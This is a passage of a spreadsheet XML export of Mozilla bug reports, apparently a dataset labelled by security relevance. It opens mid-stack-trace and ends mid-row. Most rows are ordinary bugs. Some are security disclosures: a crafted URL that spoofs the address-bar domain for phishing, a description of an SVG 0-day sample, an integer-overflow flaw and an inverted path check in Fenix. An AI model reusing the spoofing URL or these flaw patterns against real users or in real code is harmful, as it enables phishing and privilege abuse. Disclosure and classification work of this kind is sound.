    #10 0x7fd877dd8e73 in gfxPlatform::GetPlatform() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:460:5
    #11 0x7fd87f690051 in nsWindow::Create(nsIWidget*, void*, mozilla::gfx::IntRectTyped&lt;mozilla::LayoutDevicePixel&gt; const&amp;, mozilla::widget::InitData*) /builds/worker/checkouts/gecko/widget/gtk/nsWindow.cpp:6026:13
    #12 0x7fd87f472401 in nsIWidget::Create(nsIWidget*, void*, mozilla::gfx::IntRectTyped&lt;mozilla::DesktopPixel&gt; const&amp;, mozilla::widget::InitData*) /builds/worker/checkouts/gecko/widget/nsIWidget.h:463:12
    #13 0x7fd883d7e9a3 in mozilla::AppWindow::Initialize(nsIAppWindow*, nsIAppWindow*, int, int, bool, mozilla::widget::InitData&amp;) /builds/worker/checkouts/gecko/xpfe/appshell/AppWindow.cpp:213:17
    #14 0x7fd883da6f8f in nsAppShellService::JustCreateTopWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, bool, mozilla::AppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:673:15
    #15 0x7fd883da7f1f in nsAppShellService::CreateTopLevelWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, nsIAppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:179:8
    #16 0x7fd884a55160 in nsAppStartup::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, bool*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:757:15
    #17 0x7fd884c2a48f in nsWindowWatcher::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:437:33
    #18 0x7fd884c2778d in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsIArray*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1045:12
    #19 0x7fd884c21f42 in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsISupports*, mozIDOMWindowProxy**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:293:3
    #20 0x7fd8750fdce5 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #21 0x7fd876e7d6e3 in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1627:10
    #22 0x7fd876e7d6e3 in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1180:19
    #23 0x7fd876e7d6e3 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::Call</t>
        </is>
      </c>
      <c r="X2524" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2525">
      <c r="A2525" t="n">
        <v>883123</v>
      </c>
      <c r="B2525" t="inlineStr">
        <is>
          <t>2013-06-14 05:49:02 -0700</t>
        </is>
      </c>
      <c r="C2525" t="inlineStr">
        <is>
          <t>Add the private-browsing permission to the Addon Builder Helper's package.json</t>
        </is>
      </c>
      <c r="D2525" t="inlineStr">
        <is>
          <t>2013-06-24 14:32:06 -0700</t>
        </is>
      </c>
      <c r="E2525" t="n">
        <v>1</v>
      </c>
      <c r="F2525" t="n">
        <v>1</v>
      </c>
      <c r="G2525" t="n">
        <v>6</v>
      </c>
      <c r="H2525" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2525" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J2525" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2525" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2525" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2525" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2525" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2525" t="inlineStr"/>
      <c r="Q2525" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2525" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2525" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2525" t="n">
        <v>1</v>
      </c>
      <c r="U2525" t="n">
        <v>0</v>
      </c>
      <c r="V2525" t="n">
        <v>4</v>
      </c>
      <c r="W2525" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0 (Beta/Release)
Build ID: 20130516103852
Steps to reproduce:
1. Make sure, you have https://addons.mozilla.org/en-us/firefox/addon/add-on-builder-helper/ addon installed.
2. Open private window (Firefox main button &gt; New Private Window)
3. Go to https://builder.addons.mozilla.org in opened private window
4. Log in, create new addon (it can be trivial)
5. Press Test button (eye icon) to deploy the addon
Actual results:
Notification
&gt; Install Add-on Builder Helper
&gt; To test this add-on, please install the Add-on Builder Helper add-on
appears. Eventhough the addons tab shows that the helper is properly installed.
The addon is not deployed.
Expected results:
Either the addon should been deployed or a notification should say, that it is not allowed to test addons in private windows.
Current state is misleading.</t>
        </is>
      </c>
      <c r="X2525" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2526">
      <c r="A2526" t="n">
        <v>862182</v>
      </c>
      <c r="B2526" t="inlineStr">
        <is>
          <t>2013-04-15 19:12:36 -0700</t>
        </is>
      </c>
      <c r="C2526" t="inlineStr">
        <is>
          <t>Use refcounting when holding on to MediaResource* pointers</t>
        </is>
      </c>
      <c r="D2526" t="inlineStr">
        <is>
          <t>2015-10-16 11:49:42 -0700</t>
        </is>
      </c>
      <c r="E2526" t="n">
        <v>1</v>
      </c>
      <c r="F2526" t="n">
        <v>1</v>
      </c>
      <c r="G2526" t="n">
        <v>3</v>
      </c>
      <c r="H2526" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2526" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2526" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K2526" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2526" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2526" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2526" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2526" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q2526" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2526" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2526" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2526" t="n">
        <v>1</v>
      </c>
      <c r="U2526" t="n">
        <v>0</v>
      </c>
      <c r="V2526" t="n">
        <v>41</v>
      </c>
      <c r="W2526" t="inlineStr">
        <is>
          <t>This is a follow-up from bug 854319.  I tried to make ~MediaResource protected to avoid using things like nsAutoPtr with it, and then discovered that MediaDecoder::OpenResource tried to delete a raw MediaResource*.  On a cursory look, it doesn't seem like many of the MediaResource* users are using the refcounting ownership model.
Filing this as security sensitive since it might be possible to construct use-after-free bugs out of this...</t>
        </is>
      </c>
      <c r="X2526" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2527">
      <c r="A2527" t="n">
        <v>656808</v>
      </c>
      <c r="B2527" t="inlineStr">
        <is>
          <t>2011-05-12 16:54:17 -0700</t>
        </is>
      </c>
      <c r="C2527" t="inlineStr">
        <is>
          <t>Add notification message if email address is filled but checkbox is not checked</t>
        </is>
      </c>
      <c r="D2527" t="inlineStr">
        <is>
          <t>2011-08-16 14:11:26 -0700</t>
        </is>
      </c>
      <c r="E2527" t="n">
        <v>1</v>
      </c>
      <c r="F2527" t="n">
        <v>1</v>
      </c>
      <c r="G2527" t="n">
        <v>5</v>
      </c>
      <c r="H2527" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2527" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J2527" t="inlineStr">
        <is>
          <t>webifyme.org</t>
        </is>
      </c>
      <c r="K2527" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2527" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2527" t="inlineStr"/>
      <c r="Q2527" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2527" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2527" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T2527" t="n">
        <v>1</v>
      </c>
      <c r="U2527" t="n">
        <v>0</v>
      </c>
      <c r="V2527" t="n">
        <v>15</v>
      </c>
      <c r="W2527" t="inlineStr">
        <is>
          <t>To assure users that the email address field is not required, our legal team has advised we add a notification message.
Let's add this notification message to the form if a user submits the form with the email address filled out but the Privacy checkbox is not selected:
"An email address is not required to continue. If you would like to receive our newsletter, please agree to the Mozilla Privacy Policy by checking the box."
This blocks the string freeze.</t>
        </is>
      </c>
      <c r="X2527" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2528">
      <c r="A2528" t="n">
        <v>1528939</v>
      </c>
      <c r="B2528" t="inlineStr">
        <is>
          <t>2019-02-19 03:15:28 -0800</t>
        </is>
      </c>
      <c r="C2528" t="inlineStr">
        <is>
          <t>Awesomebar UI mismatch could lead to successful phishing of Firefox's users</t>
        </is>
      </c>
      <c r="D2528" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:44 -0700</t>
        </is>
      </c>
      <c r="E2528" t="n">
        <v>1</v>
      </c>
      <c r="F2528" t="n">
        <v>1</v>
      </c>
      <c r="G2528" t="n">
        <v>2</v>
      </c>
      <c r="H2528" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2528" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2528" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K2528" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2528" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2528" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [post-critsmash-triage][adv-main67+]</t>
        </is>
      </c>
      <c r="Q2528" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2528" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2528" t="inlineStr">
        <is>
          <t>Firefox 67</t>
        </is>
      </c>
      <c r="T2528" t="n">
        <v>1</v>
      </c>
      <c r="U2528" t="n">
        <v>0</v>
      </c>
      <c r="V2528" t="n">
        <v>33</v>
      </c>
      <c r="W2528" t="inlineStr">
        <is>
          <t>Created attachment 9044882
Awesomebar_UI_Mismatch.zip
I was playing a bit with crafting URIs as I know the parser's a mess and needs to handle many cases of each of the parts of the URIs and found the following (It wasn't replicated on Chrome, Explorer, Edge and Opera):
The Firefox awesomebar doesn't parse well specially crafted URIs and displays for a short time the wrong part of the URI as the domain that the browser is being directed to.
This could lead to phishing scenarios where an attacker will craft a shortened URI for example and put it in the 2nd part of the URI (the domain oculus in this case) while making the victim believe they are being directed to www.cnn.com
As the attacker can control the site, they can control how fast the site will load and the UI will change the marked domain to the read directed domain (if oculus is loading fast enough, you can change the domain to some slow site to see it more clearly)
Other parts of the URI can be leveraged to make it look like the real domain had been accessed, exfiltrate data, and so on.
PoC:
http://oculus:\\someExfiltirateDdataCouldBeUsedHereToMaskThings@www.cnn.com//rest/path/to/exfiltrate/data/to/the/real/domain/that/we/are/going/to#someMoreData</t>
        </is>
      </c>
      <c r="X2528" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2529">
      <c r="A2529" t="n">
        <v>1321066</v>
      </c>
      <c r="B2529" t="inlineStr">
        <is>
          <t>2016-11-29 12:12:26 -0800</t>
        </is>
      </c>
      <c r="C2529" t="inlineStr">
        <is>
          <t>Reported Firefox SVG 0-day (Iterator invalidation in nsSMILTimeContainer::NotifyTimeChange())</t>
        </is>
      </c>
      <c r="D2529" t="inlineStr">
        <is>
          <t>2021-02-25 17:22:08 -0800</t>
        </is>
      </c>
      <c r="E2529" t="n">
        <v>1</v>
      </c>
      <c r="F2529" t="n">
        <v>1</v>
      </c>
      <c r="G2529" t="n">
        <v>3</v>
      </c>
      <c r="H2529" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2529" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2529" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2529" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2529" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2529" t="inlineStr">
        <is>
          <t>[adv-main50+][ESR45.5.1+] Appears to be public</t>
        </is>
      </c>
      <c r="Q2529" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2529" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2529" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T2529" t="n">
        <v>1</v>
      </c>
      <c r="U2529" t="n">
        <v>0</v>
      </c>
      <c r="V2529" t="n">
        <v>92</v>
      </c>
      <c r="W2529" t="inlineStr">
        <is>
          <t>Created attachment 8815435
0-day sample -- BE CAREFUL, MAY NOT BE FULLY DE-FANGED
An admin at obscuredfiles.com received this sample as an email attachment. The vulnerability uses SVG animation and workers, and includes what looks like ASLR ROP programming to attack windows. The example is Firefox specific, and the letter writer speculates that some of the Obscured folks are known to use the Tor browser and maybe that's why they were sent this Firefox-specific file.
The cssbanner.js text has been pretty-printed by the obscured folks. The original was minified and they did not send us the original version.
I've commented out the original payload so hopefully this PoC will "work" but be harmless. Would appreciate people being extra careful with it in case there's a landmine hidden in the rop code that I left.</t>
        </is>
      </c>
      <c r="X2529" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2530">
      <c r="A2530" t="n">
        <v>1500011</v>
      </c>
      <c r="B2530" t="inlineStr">
        <is>
          <t>2018-10-18 02:02:21 -0700</t>
        </is>
      </c>
      <c r="C2530" t="inlineStr">
        <is>
          <t>Unsafe use of CheckedInt32 in nsContentUtils::CalculateBufferSizeForImage</t>
        </is>
      </c>
      <c r="D2530" t="inlineStr">
        <is>
          <t>2024-05-30 09:49:03 -0700</t>
        </is>
      </c>
      <c r="E2530" t="n">
        <v>1</v>
      </c>
      <c r="F2530" t="n">
        <v>1</v>
      </c>
      <c r="G2530" t="n">
        <v>3</v>
      </c>
      <c r="H2530" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2530" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2530" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2530" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2530" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2530" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2530" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2530" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main64+][adv-esr60.4+]</t>
        </is>
      </c>
      <c r="Q2530" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2530" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2530" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T2530" t="n">
        <v>0</v>
      </c>
      <c r="U2530" t="n">
        <v>0</v>
      </c>
      <c r="V2530" t="n">
        <v>13</v>
      </c>
      <c r="W2530" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:61.0) Gecko/20100101 Firefox/61.0
Steps to reproduce:
This is the same issue as bug#1495011. 
nsresult
nsContentUtils::CalculateBufferSizeForImage(const uint32_t&amp; aStride,
                                            const IntSize&amp; aImageSize,
                                            const SurfaceFormat&amp; aFormat,
                                            size_t* aMaxBufferSize,
                                            size_t* aUsedBufferSize)
{
  CheckedInt32 requiredBytes =
    CheckedInt32(aStride) * CheckedInt32(aImageSize.height);
  if (!requiredBytes.isValid()) {
    return NS_ERROR_FAILURE;
  }
  *aMaxBufferSize = requiredBytes.value();
  *aUsedBufferSize = *aMaxBufferSize - aStride + (aImageSize.width * BytesPerPixel(aFormat));
  return NS_OK;
}
https://searchfox.org/mozilla-central/source/dom/base/nsContentUtils.cpp#7863
requiredBytes is checked for an overflow, however a couple of lines later its raw unchecked value is used in arithmetic calculations again. Thus aUsedBufferSize can potentially overflow on x86 systems.</t>
        </is>
      </c>
      <c r="X2530" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2531">
      <c r="A2531" t="n">
        <v>713468</v>
      </c>
      <c r="B2531" t="inlineStr">
        <is>
          <t>2011-12-25 13:08:49 -0800</t>
        </is>
      </c>
      <c r="C2531" t="inlineStr">
        <is>
          <t>xulrunner builds include OpenWebapps.js, breaking add-on installation in Fedora</t>
        </is>
      </c>
      <c r="D2531" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E2531" t="n">
        <v>1</v>
      </c>
      <c r="F2531" t="n">
        <v>1</v>
      </c>
      <c r="G2531" t="n">
        <v>6</v>
      </c>
      <c r="H2531" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2531" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2531" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K2531" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2531" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2531" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2531" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2531" t="inlineStr"/>
      <c r="Q2531" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2531" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2531" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2531" t="n">
        <v>1</v>
      </c>
      <c r="U2531" t="n">
        <v>0</v>
      </c>
      <c r="V2531" t="n">
        <v>38</v>
      </c>
      <c r="W2531" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:9.0) Gecko/20100101 Firefox/9.0
Build ID: 20111220101134
Steps to reproduce:
Opening an addons details page like https://addons.mozilla.org/de/firefox/addon/ghostery/?src=hp-dl-featured. It's not possible to install an addons and the list of similar addons isn't loading
Actual results:
Firefox error log shows 3 errors:
1) Fehler: uncaught exception: [Exception... "Component returned failure code: 0x80570016 (NS_ERROR_XPC_GS_RETURNED_FAILURE) [nsIJSCID.getService]"  nsresult: "0x80570016 (NS_ERROR_XPC_GS_RETURNED_FAILURE)"  location: "JS frame :: resource:///components/OpenWebapps.js :: OpenWebapps :: line 50"  data: no]
2) Fehler: z.button is undefined
Quelldatei: https://static-ssl-cdn.addons.mozilla.net/de/firefox/addons/buttons.js?b=01ad944
Zeile: 13
3) Fehler: $(".install").installButton is not a function
Quelldatei: https://static-ssl-cdn.addons.mozilla.net/media/js/impala-min.js?build=01ad944
Zeile: 1
Expected results:
The page should load as expected and it should be able to install addons.</t>
        </is>
      </c>
      <c r="X2531" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2532">
      <c r="A2532" t="n">
        <v>1684627</v>
      </c>
      <c r="B2532" t="inlineStr">
        <is>
          <t>2020-12-31 23:10:29 -0800</t>
        </is>
      </c>
      <c r="C2532" t="inlineStr">
        <is>
          <t>Any websites can run with PWA privileges on Fenix (bypassing fix of Bug 1657026)</t>
        </is>
      </c>
      <c r="D2532" t="inlineStr">
        <is>
          <t>2024-05-30 10:25:30 -0700</t>
        </is>
      </c>
      <c r="E2532" t="n">
        <v>1</v>
      </c>
      <c r="F2532" t="n">
        <v>1</v>
      </c>
      <c r="G2532" t="n">
        <v>2</v>
      </c>
      <c r="H2532" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2532" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J2532" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2532" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2532" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2532" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2532" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main86+]</t>
        </is>
      </c>
      <c r="Q2532" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2532" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2532" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2532" t="n">
        <v>1</v>
      </c>
      <c r="U2532" t="n">
        <v>0</v>
      </c>
      <c r="V2532" t="n">
        <v>6</v>
      </c>
      <c r="W2532" t="inlineStr">
        <is>
          <t>Bug 1657026 can still be reproduced on the latest Fenix Nightly (retested it today).
As a countermeasure of Bug 1657026, a function `isUnderFennecManifestDirectory` was introduced for verifying given manifest directory is under &lt;filesDir&gt;/mozilla/&lt;profile&gt;/manifests/ (see below).
https://github.com/mozilla-mobile/fenix/blob/faf765a57d78be91deed9ed9ef54d24f31075192/app/src/main/java/org/mozilla/fenix/customtabs/FennecWebAppIntentProcessor.kt#L130
But the verification logic seems incorrect.
Here, if an attacker gives wrong manifest path such as `/data/local/tmp/dummy_manifest.json`, `manifestsDir.name != "manifests"` returns `true`, but `true` means that given manifest path is under the expected directory.
```
return manifestsDir == null || manifestsDir.name != "manifests" ||
    // Check that the folder two levels up is named "mozilla"
    manifestsDir.parentFile?.parentFile != getMozillaDirectory()
```
It seems this comparison part should be changed like below.
```
return manifestsDir == null || (manifestsDir.name == "manifests" &amp;&amp;
        // Check that the folder two levels up is named "mozilla"
        manifestsDir.parentFile?.parentFile == getMozillaDirectory())
```
Sorry for the delay in discovering the mistake.</t>
        </is>
      </c>
      <c r="X2532" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2533">
      <c r="A2533" t="n">
        <v>464163</v>
      </c>
      <c r="B2533" t="inlineStr">
        <is>
          <t>2008-11-10 19:47:17 -0800</t>
        </is>
      </c>
      <c r="C2533" t="inlineStr">
        <is>
          <t>do l10n repackages on change</t>
        </is>
      </c>
      <c r="D2533" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2533" t="n">
        <v>1</v>
      </c>
      <c r="F2533" t="n">
        <v>1</v>
      </c>
      <c r="G2533" t="n">
        <v>5</v>
      </c>
      <c r="H2533" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2533" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2533" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2533" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2533" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2533" t="inlineStr"/>
      <c r="Q2533" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2533" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2533" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2533" t="n">
        <v>1</v>
      </c>
      <c r="U2533" t="n">
        <v>0</v>
      </c>
      <c r="V2533" t="n">
        <v>32</v>
      </c>
      <c r="W2533" t="inlineStr">
        <is>
          <t>Currently we do an l10n repackage when a localizer makes a change in their l10n-central repo.
This repackage on change is done from bsmedberg's setup from bug 434289
These machines used are not part of the pool of build slaves
To do these changes we will have to look at the HgPollers that bsmedberg and pike have been using in their setups and see which one makes more sense to port without having to hack a lot the pollers
Both of them use "from buildbotcustom.changes.hgpoller import HgAllLocalesPoller, HgPoller"
but I do not know how many differences (if any) are between what they have in their local repo and what is living on cvs-buildbotcustom
bsmedberg -&gt; http://hg.mozilla.org/users/bsmedberg_mozilla.com/l10n-buildbot/file/8e56dbb400d7/master.cfg#l32
pike -&gt; http://hg.mozilla.org/users/axel_mozilla.com/tooling/file/b4a8228e90ab/buildbot-configs/l10n/master.cfg#l51</t>
        </is>
      </c>
      <c r="X2533" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2534">
      <c r="A2534" t="n">
        <v>113917</v>
      </c>
      <c r="B2534" t="inlineStr">
        <is>
          <t>2001-12-06 15:12:48 -0800</t>
        </is>
      </c>
      <c r="C2534" t="inlineStr">
        <is>
          <t>Need support for XP Print Dialog, or user -defined Print dialog</t>
        </is>
      </c>
      <c r="D2534" t="inlineStr">
        <is>
          <t>2002-05-20 15:55:10 -0700</t>
        </is>
      </c>
      <c r="E2534" t="n">
        <v>1</v>
      </c>
      <c r="F2534" t="n">
        <v>1</v>
      </c>
      <c r="G2534" t="n">
        <v>3</v>
      </c>
      <c r="H2534" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2534" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2534" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K2534" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2534" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2534" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2534" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2534" t="inlineStr"/>
      <c r="Q2534" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2534" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2534" t="inlineStr">
        <is>
          <t>mozilla0.9.8</t>
        </is>
      </c>
      <c r="T2534" t="n">
        <v>1</v>
      </c>
      <c r="U2534" t="n">
        <v>0</v>
      </c>
      <c r="V2534" t="n">
        <v>61</v>
      </c>
      <c r="W2534" t="inlineStr">
        <is>
          <t>Each platform needs infrastructure for being to "fly" a native dialog, or there
own dialog.</t>
        </is>
      </c>
      <c r="X2534" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2535">
      <c r="A2535" t="n">
        <v>1239538</v>
      </c>
      <c r="B2535" t="inlineStr">
        <is>
          <t>2016-01-13 17:48:21 -0800</t>
        </is>
      </c>
      <c r="C2535" t="inlineStr">
